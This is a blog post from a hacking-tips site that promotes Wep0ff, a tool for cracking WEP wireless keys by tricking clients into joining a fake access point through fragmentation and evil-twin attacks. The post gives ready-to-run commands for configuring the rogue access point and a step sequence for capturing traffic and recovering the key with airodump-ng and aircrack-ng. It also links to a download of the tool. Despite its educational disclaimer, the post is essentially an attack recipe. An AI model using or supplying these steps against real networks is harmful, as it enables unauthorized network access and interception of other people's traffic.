The Content Provided on HackClarify are Only for Security Awareness & Educational Purposes Only, Hackclarify is Not Responsible for any Harm Done!
Place Your Ads Here By Requesting Using The Contact Form
Add to Google Reader or Homepage Add to Netvibes Add to Yahoo! Subscribe in NewsGator Online Add to My AOL

Crack Wireless WEP Passwords with Wep0ff





Wep0ff is new tool to crack WEP-key without access to AP by mount fake access point attack against WEP-based wireless clients.

It uses combination of fragmentation and evil twin attacks to generate
traffic which can be used for KoreK-style WEP-key recovery.

This tool can be used to mount fake access point attack against WEP-based wireless clients.

This code tested patched madwifi-old drivers with athraw support, but also works with madwifi-ng. With madwifi-ng you need to create two virtual interfaces: one in master mode (for fake AP) and second in monitor mode (to listen on).

How to Use:

1. Setup fake AP with KARMA tools or iwconfig

iwpriv ath0 mode 2
iwconfig ath0 mode master essid foo enc 1122334455 channel 7
echo 1 > /proc/sys/dev/ath0/rawdev
echo 1 > /proc/sys/dev/ath0/rawdev_type
ifconfig ath0
up ifconfig ath0raw up

2. Start this program (./wep0ff ath0raw 00:01:02:03:04:05)
3. Wait until client connect to fake access point
4. Launch airodump-ng to collect packets
5. Launch aircrack-ng to recover WEP key

You can download it here:
Wep0ff




Share your views...

0 Respones to "Crack Wireless WEP Passwords with Wep0ff"

Post a Comment

 

Google+

Supported/Suggested Browsers for our site
Fight Spam! Click Here!

Don't Copy Articles

Protected by Copyscape Plagiarism Detector
DMCA Protected

Expand HackClarify

Hacking Tips & Tricks

If HackClarify articles have helped you in learning then copy code below and give a small place to this image in your blog or website:

Attribution

Creative Commons LicenseThis work is licensed under a Creative Commons Attribution-NoDerivs 3.0 Unported License. Dont Copy or Reproduce Articles.

© 2012 | Founded & Maintained by Samin Yasar | All Rights Reserved